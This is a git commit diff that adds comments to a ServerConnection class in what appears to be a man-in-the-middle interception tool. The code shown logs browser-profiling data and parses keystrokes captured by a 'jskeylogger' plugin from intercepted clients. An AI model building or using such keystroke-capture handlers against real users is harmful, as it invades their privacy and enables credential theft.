added some comments

This commit is contained in:
byt3bl33d3r 2014-07-11 20:07:46 +02:00
parent b16becd65f
commit aa89c7f6ed

View file

@ -75,10 +75,12 @@ class ServerConnection(HTTPClient):
self.endHeaders()
def sendPostData(self):
#Handle the browserprofiler plugin output
if 'clientprfl' in self.uri:
out = pformat(self.post2dict(self.postData))
logging.warning(str(self.client.getClientIP()) + " Browser Profilerer data:\n" + out)
#Handle the jskeylogger plugin output
elif 'keylog' in self.uri:
keys = self.postData.split(",")
del keys[0]; del(keys[len(keys)-1])